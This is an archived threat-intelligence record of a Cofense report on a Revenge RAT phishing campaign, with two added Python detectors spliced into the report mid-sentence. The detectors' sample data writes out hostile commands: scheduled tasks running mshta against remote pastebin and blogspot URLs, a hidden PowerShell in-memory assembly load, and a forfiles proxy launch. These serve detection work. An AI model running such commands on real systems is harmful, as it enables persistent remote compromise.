{
	"id": "8e804b2b-e84d-4eb4-b6ca-d4b0fdb21aee",
	"created_at": "2026-04-06T00:15:17.63916Z",
	"updated_at": "2026-04-10T03:21:48.490963Z",
	"deleted_at": null,
	"sha1_hash": "94945f67f4a60eba2d131a12df1cb7c2efeab60f",
	"title": "With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat - Cofense",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 176923,
	"plain_text": "With Upgrades in Delivery and Support Infrastructure, Revenge\r\nRAT Malware is a Bigger Threat - Cofense\r\nBy Max Gannon\r\nPublished: 2019-02-11 · Archived: 2026-04-05 23:00:15 UTC\r\nCISO Summary\r\nThe Revenge RAT malware is getting stealthier, thanks to unusually advanced delivery techniques and support\r\ninfrastructure. Cofense Intelligence™ has recently seen this basic and widely available Remote Access Trojan\r\nbenefit from these upgrades. Once installed, Revenge RAT can access webcams, microphones, and other utilities as it\r\ndoes recon and tries to gain a foothold in targeted computers. When they succeed, RATs enable threat actors to\r\nwreak havoc, including monitoring user behavior through keyloggers or other spyware, filching personal\r\ninformation, and distributing other malware.\r\nWith redundant command and control infrastructure masked as legitimate content, threat actors can deliver a\r\nsample of Revenge RAT without leaving files on disk. Revenge RAT uses a Microsoft Office Excel Worksheet\r\nwith an Office macro to infect targets. The macro launches mshta.exe to run scripts embedded in the HTML of a\r\ncustom-built blogspot.com page. The complex infection chain, focus on maintaining persistence, and tactics to\r\nevade detection add up to a sophisticated threat.\r\nFull Details\r\nCofense Intelligence recently observed an email campaign delivering Revenge RAT that exhibited above-average\r\nsophistication in its delivery technique and persistence mechanisms. Revenge RAT is a simple and freely available\r\nRemote Access Trojan that automatically gathers system information before allowing threat actors to remotely\r\naccess system components such as webcams, microphones, and various other utilities. This can enable threat\r\nactors to perform reconnaissance and establish a beachhead for further activities. 
In this campaign, threat actors\r\nused redundant command and control infrastructure disguised as legitimate content to deliver a sample of Revenge\r\nRAT without leaving files on disk.\r\nThe initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses\r\nthe mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted\r\nblogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled\r\ntasks and also retrieve, decode, and execute a copy of Revenge RAT.\r\nBreaking it Down\r\nIn the example script shown in Figure 1, the first task (“MS-OFFICE”) is set to run a script (urGHE2PF) hosted\r\non a secondary command and control location on pastebin every 10 minutes.\r\nhttps://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/\r\nPage 1 of 4\n\nFigure 1: Code from 29[.]html scheduling the first task to run a script from pastebin\r\nThe second task (“MSOFFICEER”) in Figure 2 runs the script contents of a different page of the same blog, blog-page[.]html, every 100 minutes.\r\nFigure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page\r\nThe last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the\r\nmemory of a running process, as seen in Figure 3.\r\nFigure 3: Script code embedded in 29[.]html used to download and run Revenge RAT\r\nThe script shown in Figure 4 is almost identical to the one used by the script contents of 29[.]html (in Figure 3),\r\nthe only differences being the absence of a sleep command and the use of the “forfiles” utility.\r\nFigure 4: Similar code used to download Revenge RAT and inject the binary into memory\r\nFinally, the script contents of blog-page[.]html schedule the same task (“MSOFFICEER”) to run itself. 
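The chain described above (Excel macro to mshta.exe, scheduled tasks that pull scripts from pastebin and blogspot every few minutes, PowerShell loading the binary in memory, forfiles used as a launcher) leaves a recognizable trail in process-creation telemetry. The Python detector below is an added example and not code from the Cofense report: it scores Sysmon-style process events for that tradecraft. The events, the REDACTED.blogspot.com hostname and the exact command lines are constructed for this example (written defanged, with the quoting around the schtasks /tr and forfiles /c values omitted); only the task names MS-OFFICE and MSOFFICEER, the page names and the pastebin ID urGHE2PF come from the report.

```python
import ntpath
from dataclasses import dataclass

OFFICE_APPS = {'excel.exe', 'winword.exe', 'powerpnt.exe', 'outlook.exe'}
SCRIPT_HOSTS = {'mshta.exe', 'wscript.exe', 'cscript.exe', 'powershell.exe'}
ABUSED_SITES = ('blogspot.com', 'pastebin.com')
# Task names from the report; campaign-specific, so treat as a low-confidence IOC.
KNOWN_TASK_NAMES = ('ms-office', 'msofficeer')


@dataclass
class ProcEvent:
    image: str          # path of the created process (Sysmon Event ID 1 'Image')
    parent_image: str   # 'ParentImage'
    command_line: str   # 'CommandLine'


def refang(text):
    """Undo report-style defanging so URL checks see what the endpoint saw."""
    return text.replace('hxxp', 'http').replace('[.]', '.')


def tag_event(ev):
    """Return the set of tradecraft tags that fire for one event."""
    image = ntpath.basename(ev.image).lower()
    parent = ntpath.basename(ev.parent_image).lower()
    cmd = refang(ev.command_line).lower()
    has_url = 'http://' in cmd or 'https://' in cmd
    names_script_host = any(h[:-4] in cmd for h in SCRIPT_HOSTS)
    tags = set()

    # Office macro spawning a script host (the Excel -> mshta.exe initial vector).
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        tags.add('office-spawns-script-host')
    # mshta.exe fetching its script from a remote page instead of a local .hta.
    if image == 'mshta.exe' and has_url:
        tags.add('mshta-remote-url')
    # schtasks creating a minute-granularity task whose action is a script host + URL.
    if image == 'schtasks.exe' and '/create' in cmd:
        if '/sc minute' in cmd and has_url and names_script_host:
            tags.add('schtasks-remote-script')
        if any(name in cmd for name in KNOWN_TASK_NAMES):
            tags.add('known-task-name')
    # PowerShell loading an assembly from bytes rather than from a file on disk.
    if image == 'powershell.exe' and 'reflection.assembly' in cmd and '::load' in cmd:
        tags.add('in-memory-assembly-load')
    # forfiles.exe used as a proxy launcher for a script host (the Figure 4 variant).
    if image == 'forfiles.exe' and ' /c ' in cmd and names_script_host:
        tags.add('forfiles-proxy-exec')
    # C2 or staging hidden behind a legitimate content service.
    if any(site in cmd for site in ABUSED_SITES):
        tags.add('legit-service-c2')
    return tags


def detect(events):
    """Index -> tags for every event that fired at least one tag."""
    findings = {}
    for i, ev in enumerate(events):
        tags = tag_event(ev)
        if tags:
            findings[i] = tags
    return findings


# Constructed sample telemetry. Hostnames are placeholders, command lines are
# defanged, and the quoting around the /tr and /c values is omitted.
SAMPLE_EVENTS = [
    ProcEvent('C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE',
              'C:\\Windows\\explorer.exe',
              'EXCEL.EXE invoice.xls'),
    ProcEvent('C:\\Windows\\System32\\mshta.exe',
              'C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE',
              'mshta hxxp://REDACTED.blogspot[.]com/p/29[.]html'),
    ProcEvent('C:\\Windows\\System32\\schtasks.exe',
              'C:\\Windows\\System32\\mshta.exe',
              'schtasks /create /sc MINUTE /mo 10 /tn MS-OFFICE /tr mshta hxxps://pastebin[.]com/raw/urGHE2PF /f'),
    ProcEvent('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
              'C:\\Windows\\System32\\mshta.exe',
              'powershell -w hidden -c [Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)'),
    ProcEvent('C:\\Windows\\System32\\forfiles.exe',
              'C:\\Windows\\System32\\mshta.exe',
              'forfiles /p C:\\Windows\\System32 /m notepad.exe /c mshta hxxp://REDACTED.blogspot[.]com/p/blog-page[.]html'),
    ProcEvent('C:\\Windows\\System32\\schtasks.exe',      # benign control
              'C:\\Windows\\System32\\cmd.exe',
              'schtasks /create /sc DAILY /tn Sync /tr C:\\Tools\\sync.exe'),
]


if __name__ == '__main__':
    for i, tags in sorted(detect(SAMPLE_EVENTS).items()):
        print(i, ntpath.basename(SAMPLE_EVENTS[i].image), sorted(tags))
```

Run as a script it prints the four events that fire (the Excel-spawned mshta, the MS-OFFICE task, the in-memory load and the forfiles launcher) and stays silent on the Excel launch and the daily task. The individual tags are deliberately cheap; the signal worth alerting on is several of them firing in one process tree within minutes, which is what this chain produces.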
Revenge\r\nRAT used in this instance is not dropped to disk but is instead loaded into the memory of a process using the\r\n.NET “Reflection.Assembly” class from PowerShell. A similar method is used to execute the script content of the\r\ncommand and control locations rather than dropping the scripts to disk and then running them. By scheduling\r\ntasks to run scripts and binaries in memory rather than on disk, the threat actors are able to avoid some traditional\r\nmeans of detection.\r\nHidden Content\r\nThe primary command and control location used in this campaign is hosted on a blog on blogspot[.]com, which\r\nenables the threat actors to hide their malicious content behind a legitimate service. Even if the web pages are\r\ndirectly visited in a browser, they appear to be underdeveloped but show no visible malicious content (Figure 5).\r\nFigure 5: How the blog-page[.]html web page appears when visited in a browser\r\nThe malicious content cannot be run in a browser; it only runs when mshta.exe is used, which also prevents the\r\ncontent from being recognized by most web debuggers. It is only by viewing the source code of these pages that\r\nany malicious content becomes viewable (Figure 6).\r\nFigure 6: The script embedded in the blog-page[.]html web page\r\nAs shown in Figure 7, decoding the script contents shown in Figure 6 reveals the same code as we saw in Figure\r\n2, which schedules the execution of the page content.\r\nFigure 7: The same de-obfuscated code as Figure 2\r\nThe only other script content of the blog-page[.]html is an empty script section. 
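As an added example (not code from the Cofense report), the Python script below does what the analysis above describes doing by hand: it pulls every script block out of a page's source, flags blocks that only the mshta.exe/Internet Explorer engine would run (VBScript, ActiveX CreateObject), and decodes Chr()-concatenated strings so the scheduling command becomes readable. The HTML page, the REDACTED.blogspot.com hostname and the Chr() obfuscation are constructed for this example; the report does not say which scheme it decoded, so the Chr() chain is an illustrative stand-in, and the quoting around the schtasks /tr value is omitted.

```python
import re
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect (language, body) for every <script> block in a page."""

    def __init__(self):
        super().__init__()
        self.blocks = []
        self._lang = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            a = dict(attrs)
            # <script language=VBScript> is the legacy form that mshta/IE honour.
            self._lang = (a.get('language') or a.get('type') or 'javascript').lower()
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == 'script' and self._buf is not None:
            self.blocks.append((self._lang, ''.join(self._buf).strip()))
            self._buf = None


# A run of Chr(n) calls joined by &. The lookahead keeps a trailing & that joins
# onto a variable (Chr(72)&x) out of the match so the variable survives.
CHR_CHAIN = re.compile(r'(?:chr\(\d{1,3}\)(?:\s*&\s*(?=chr\())?)+', re.IGNORECASE)
CHR_CALL = re.compile(r'chr\((\d{1,3})\)', re.IGNORECASE)


def decode_chr_chains(code):
    """Replace each Chr(n)&Chr(m)... chain with the string literal it builds."""
    def repl(m):
        return '"' + ''.join(chr(int(n)) for n in CHR_CALL.findall(m.group(0))) + '"'
    return CHR_CHAIN.sub(repl, code)


INDICATORS = ('wscript.shell', 'schtasks', '/sc minute', 'mshta',
              'http://', 'https://', 'reflection.assembly')


def analyze_page(html):
    """One finding per script block: who would run it, decoded body, indicators."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for lang, body in parser.blocks:
        decoded = decode_chr_chains(body)
        low = decoded.lower()
        findings.append({
            'language': lang,
            # Modern browsers run neither VBScript nor ActiveX CreateObject; mshta.exe does.
            'mshta_only': lang.startswith('vbs') or 'createobject(' in low,
            'empty': body == '',
            'decoded': decoded,
            'indicators': [ind for ind in INDICATORS if ind in low],
        })
    return findings


def chr_encode(text):
    """VBScript-style Chr() concatenation; used only to build the constructed sample."""
    return '&'.join('Chr(%d)' % ord(c) for c in text)


# Constructed sample: a bare blog post whose source carries a self-scheduling
# VBScript block plus an empty block the actor can fill later.
TASK_CMD = ('schtasks /create /sc MINUTE /mo 100 /tn MSOFFICEER '
            '/tr mshta http://REDACTED.blogspot.com/p/blog-page.html /f')
SAMPLE_PAGE = '''<html><body><h1>My blog</h1><p>Coming soon.</p>
<script language='VBScript'>
Set sh = CreateObject(%s)
sh.Run %s, 0, False
</script>
<script language='VBScript'>
</script>
</body></html>''' % (chr_encode('WScript.Shell'), chr_encode(TASK_CMD))


if __name__ == '__main__':
    for i, f in enumerate(analyze_page(SAMPLE_PAGE)):
        print(i, f['language'], 'mshta_only=%s' % f['mshta_only'],
              'empty=%s' % f['empty'], f['indicators'])
        print('   ', f['decoded'])
```

The second, empty block is reported on purpose: in this campaign an empty script section is not harmless, because the self-scheduled task will execute whatever the actor later pastes into it, so a periodic re-fetch of the page and a diff of its script blocks is the natural follow-up.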
By repeatedly “self-scheduling”\r\nthe execution of the blog-page[.]html, the threat actor ensures that any content they add to this empty script\r\nsection will also be executed. The script self-scheduling, as well as the scheduling of a script that repeatedly\r\nattempts to download and execute the Revenge RAT binary, significantly contribute to the persistence of this\r\ninfection. In both cases, the threat actor can modify the hosted content at any time as needed, such as in the case of\r\ninfrastructure failure or payload change. The frequent checking ensures that any changes made will be quickly\r\nfollowed, and the repeated attempts to run the Revenge RAT binary make it almost certain that even if the process\r\nis terminated, the RAT will be running again soon.\r\nImplications of This Malware\r\nThe complex infection chain, redundant command and control infrastructure, focus on maintaining persistence,\r\nand attempts to evade detection exhibited by this campaign indicate an above-average level of sophistication.\r\nHigher levels of sophistication require higher levels of expertise and an increased understanding of the threats\r\norganizations face. By preparing employees and training them to be alert to threats, organizations can better\r\nprotect themselves. 
Learn how Cofense PhishMe™ conditions users to recognize and report the latest phishing\r\nand malware campaigns.\r\nAll third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise,\r\nremain the property of their respective holders, and use of these trademarks in no way indicates any relationship\r\nbetween Cofense and the holders of the trademarks.\r\nSource: https://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/"
	],
	"report_names": [
		"upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434517,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/94945f67f4a60eba2d131a12df1cb7c2efeab60f.pdf",
		"text": "https://archive.orkl.eu/94945f67f4a60eba2d131a12df1cb7c2efeab60f.txt",
		"img": "https://archive.orkl.eu/94945f67f4a60eba2d131a12df1cb7c2efeab60f.jpg"
	}
}